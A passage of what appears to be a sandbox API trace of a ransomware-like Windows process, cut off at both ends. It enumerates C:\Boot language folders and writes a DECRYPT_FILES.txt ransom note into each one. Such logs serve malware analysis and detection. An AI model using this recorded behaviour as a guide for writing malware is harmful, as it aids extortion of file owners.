ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.083] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0054.083] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.083] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0054.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0054.083] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\hu-hu\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.084] GetFileType (hFile=0x408) returned 0x1 [0054.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0054.084] GetFileType (hFile=0x408) returned 0x1 [0054.084] WriteFile (in: hFile=0x408, lpBuffer=0x21b8bb8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21b8bb8*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0054.085] CloseHandle (hObject=0x408) returned 1 [0054.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.085] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0054.085] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\", lpFilePart=0x0) returned 0xe [0054.085] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.090] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.090] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.090] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.090] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.090] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0054.090] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\", lpFilePart=0x0) returned 0xe [0054.091] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.091] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.091] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.091] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0054.091] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.091] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0054.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0054.092] CreateFileW (lpFileName="C:\\Boot\\it-IT\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\it-it\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.092] GetFileType (hFile=0x408) returned 0x1 [0054.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0054.092] GetFileType (hFile=0x408) returned 0x1 [0054.092] WriteFile (in: hFile=0x408, lpBuffer=0x21bc5e0*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21bc5e0*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0054.093] CloseHandle (hObject=0x408) returned 1 [0054.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.094] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0054.094] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\", lpFilePart=0x0) returned 0xe [0054.094] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.094] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.094] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.094] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.095] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.095] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0054.095] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\", lpFilePart=0x0) returned 0xe [0054.095] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.095] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.095] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.095] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0054.096] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.096] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0054.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0054.096] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\ja-jp\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.096] GetFileType (hFile=0x408) returned 0x1 [0054.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0054.096] GetFileType (hFile=0x408) returned 0x1 [0054.096] WriteFile (in: hFile=0x408, lpBuffer=0x21c0008*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21c0008*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0054.097] CloseHandle (hObject=0x408) returned 1 [0054.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.097] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0054.097] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\", lpFilePart=0x0) returned 0xe [0054.097] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.098] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.098] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.098] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.098] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.098] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0054.098] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\", lpFilePart=0x0) returned 0xe [0054.098] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.099] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.099] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.099] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0054.099] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.099] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0054.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0054.100] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\nb-no\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.100] GetFileType (hFile=0x408) returned 0x1 [0054.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0054.100] GetFileType (hFile=0x408) returned 0x1 [0054.100] WriteFile (in: hFile=0x408, lpBuffer=0x21c3a30*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21c3a30*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0054.101] CloseHandle (hObject=0x408) returned 1 [0054.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.101] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0054.102] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\", lpFilePart=0x0) returned 0xe [0054.102] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.103] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.103] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.103] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.104] FindClose (in: hFindFile=0x1a5de030 | out: 